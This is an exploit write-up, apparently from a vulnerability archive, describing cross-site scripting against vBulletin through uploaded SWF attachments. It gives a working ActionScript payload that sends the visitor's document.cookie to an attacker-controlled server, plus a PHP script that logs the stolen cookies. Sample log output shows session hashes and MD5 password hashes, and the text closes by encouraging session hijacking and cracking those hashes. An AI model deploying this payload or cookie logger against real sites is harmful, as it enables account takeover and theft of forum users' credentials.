XSS with Vbulletin (new idea !)

2006.12.29
Credit: Ashraf Morad
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Author : Ashraf Morad Contact : ashraf1984 (at) hotmail (dot) com [email concealed] XSS with vBulletin (Attachments supported , SWF is a valid extension) ! Materials : -Any SWF file with an actionscript frame : ActionScript Code : getURL("javascript:function blab(){}var scriptNode = document.createElement('script');document.getElementsByTagName('body')[0 ].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.sr c='http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie;blab();" ); -PHP page hosted : UrPHPpage.php code : <? $fp = fopen("Mylog.txt","a"); if($_GET['Cookie']) { $str=" ".date("Y-m-d h:i:s")."^".$_GET['Cookie']; fwrite($fp,$str); } fclose($fp); ?> Or you can send the cookie to your email ... Then the Log file will be like this : 2006-12-22 10:00:57^bbsessionhash=5d5bbd44581e8670511dea2336bf6b7c; bblastvisit=1166967717; bblastactivity=0; bbforum_view=7dc07389c9e27c2ff67b4da319df9596a-1-{i-3_i-1166967717_}; bbuserid=913; bbpassword=ae0f78853127d9847dce0bfe6427bc2d 2006-12-22 10:25:39^bblastvisit=1166967717; bblastactivity=0; bbuserid=9913; bbpassword=ae0f78853127d9847dce0bfe6427bc2d; bbsessionhash=3d085f4ee5d4e4ac7af73e18d8fb6539; bbforum_view=6f750f5b123c84f0be72a9844b9cebaba-1-{i-3_i-1166973674_} Then you can use any cookie editor or you can crack the MD5 password hash ... enjoy ;)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top